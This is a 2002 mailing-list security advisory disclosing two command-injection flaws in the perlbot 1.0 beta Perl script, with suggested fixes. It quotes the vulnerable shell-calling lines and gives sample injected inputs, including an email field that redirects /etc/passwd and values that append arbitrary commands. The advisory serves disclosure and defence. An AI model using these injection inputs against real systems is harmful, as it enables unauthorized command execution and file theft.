81655 2002-10-19 01:04 /111 rader/ guejez <guejez@scan-associates.net>
Importerad: 2002-10-19 01:04 av Brevbäraren
Extern mottagare: vulnwatch@vulnwatch.org
Mottagare: Bugtraq (import) <2017>
Ärende: SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution
------------------------------------------------------------
perlbot 1.0 beta - Remote Command Execution
Discovered By guejez of scan-associates.net
About perlbot:
------------------
[quote from perlbot website]
""
[/quote from perlbot website]
perlbot is avaliable at http://stigmata.gothcafe.com/~madhater
Vulnerable (tested) Versions:
--------------------
Perlbot version 1.0 beta on SuSe 7.3
Vendor Contact:
----------------
07-22-02 - Emailed myneid ^^at^^ gothcafe.com Alerted him of this
vulnerability
07-22-02 - Recieved email confirming vulnerabilties and stating fixes could
be
in new version.
Vulnerabilities:
----------------
-- Command Execution
1. Due to no input filtering and a call to the shell the script could be
used to
execute any command it has permission to.
A more detailed explaination:
The script does not limit the characters sent to the shell from user
input. The problem is in this line:
foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)
Which allows an attacker to "break out" of the quotes and issue any
command
they wish by doing something like anything";cmd. Other abuses could be
issuing
commands with `cmd` and $(cmd) or \xxx where xxx is the octal value of any
character. Some form of user input filtering must be used.
2. Due to no input filtering and a bad open() call when the script attempts
to send
email it is possible to execute commands.
A more detailed explaination:
The script attempts to send an email to the user. It takes the user's
email
address and passes it to the shell as an argument to the mail program:
open (MAIL,"| $sendmail $recipient") || die $!;
This means things like hacker@scan-associates.net < /etc/passwd
could be used as
an email address to get any file from the system the script has
permission to
read. Or command execution is possible with
hacker@scan-associates.net ; cmd.
Inorder to prevent this simply take the $recipient value out of the
shell call.
Proof Of Concept:
-----------------
No proof of concept will be givin for these issues.
Fix:
----
According to the author a fix could be in a new verison of the
script. The script's
homepage was down at the time of this advisory, so here is the suggested
fix. Replace
the following line:
my $word=$';
With:
my $word=$';
$word =~ s/[^\w]//g;
And replace the following line:
open (MAIL,"| $sendmail $recipient") || die $!;
With:
open (MAIL,"| $sendmail -t") || die $!;
Thanks:
-------
irc.efnet.org #vuln - various people helping with perl security issues.
pokleyzz, sk , and all of scan-associates.net
--------------------------------------------------------------------------
http://www.scan-associates.net/
(81655) /guejez <guejez@scan-associates.net>/(Ombruten)